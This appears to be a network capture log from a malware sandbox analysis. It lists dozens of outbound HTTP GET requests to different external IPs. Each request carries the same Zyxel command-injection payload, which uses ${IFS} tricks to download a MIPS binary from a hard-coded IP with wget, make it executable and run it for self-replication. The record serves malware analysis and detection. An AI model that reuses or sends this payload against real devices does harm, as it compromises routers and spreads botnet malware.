                                                Jan 29, 2024 07:08:05.691876888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8829192.168.2.234369266.170.27.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.691904068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8830192.168.2.2356758204.9.223.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.691960096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8831192.168.2.2343734171.208.101.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.691983938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8832192.168.2.234152480.64.18.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.692032099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8833192.168.2.235330843.173.28.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.702660084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8834192.168.2.234999840.227.103.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.702716112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8835192.168.2.2356544187.53.122.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.702780962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8836192.168.2.233640063.108.109.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.702820063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8837192.168.2.2355020160.136.7.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.702965975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8838192.168.2.2348294119.91.18.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.702991962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8839192.168.2.2360664154.109.106.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.703021049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8840192.168.2.235965477.165.14.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.703052998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8841192.168.2.2350768184.45.161.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.703088999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8842192.168.2.233282844.58.253.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.703131914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8843192.168.2.2349040165.52.65.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.703180075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8844192.168.2.2336214107.20.237.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.703212976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8845192.168.2.2334116102.67.121.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.703269958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8846192.168.2.235744888.8.239.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.703305006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8847192.168.2.2343160212.38.90.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.703331947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8848192.168.2.2350690188.242.20.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.703386068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8849192.168.2.2345496114.240.92.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.703417063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8850192.168.2.2346268108.77.213.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.703442097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8851192.168.2.2349868180.203.193.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.703512907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8852192.168.2.2350372176.3.77.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.703536034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8853192.168.2.2345832203.198.108.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.703574896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8854192.168.2.2350674112.218.123.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.703623056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8855192.168.2.2341954103.117.12.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.703676939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8856192.168.2.2360086122.235.243.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.703699112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8857192.168.2.234051058.234.160.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.703737974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8858192.168.2.2333424142.201.226.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.703793049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8859192.168.2.235151891.165.24.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.703825951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8860192.168.2.235329861.34.192.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.703860998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8861192.168.2.2345888189.71.196.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.703917027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8862192.168.2.235438472.251.183.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.703948975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8863192.168.2.234378479.153.46.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.703985929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8864192.168.2.234458836.47.198.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.704005003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8865192.168.2.233658423.255.125.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.704052925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8866192.168.2.235667812.116.38.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.704108000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8867192.168.2.234358646.146.205.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.704134941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8868192.168.2.233399068.42.165.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.704185009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8869192.168.2.233458820.254.158.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.704211950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8870192.168.2.233398254.123.59.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.704267025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8871192.168.2.2345326147.105.191.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.704301119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8872192.168.2.233927851.189.110.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.704348087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8873192.168.2.2341898109.139.165.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.704372883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8874192.168.2.2357326174.32.108.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.704410076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8875192.168.2.2338006119.19.21.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.704437971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8876192.168.2.235593038.153.24.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.704503059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8877192.168.2.2335990180.94.113.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.704516888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8878192.168.2.233333431.214.65.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.704567909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8879192.168.2.2354098175.57.205.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.704595089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8880192.168.2.2342452135.10.102.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.704622030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8881192.168.2.2348722136.191.39.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.704689026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8882192.168.2.2334284151.206.130.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.704730988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8883192.168.2.2341780126.241.48.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.704760075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8884192.168.2.2353498138.219.125.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.704817057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8885192.168.2.234139085.166.116.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.704871893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8886192.168.2.2345444112.127.122.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.704915047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8887192.168.2.2345512158.231.162.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.704966068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8888192.168.2.2359100182.147.47.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.705012083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8889192.168.2.2334722196.154.106.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.705039978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8890192.168.2.2343460201.174.218.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.705074072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8891192.168.2.2350450131.205.179.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.705136061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8892192.168.2.2348890186.5.104.163443
                                                TimestampBytes transferredDirectionData
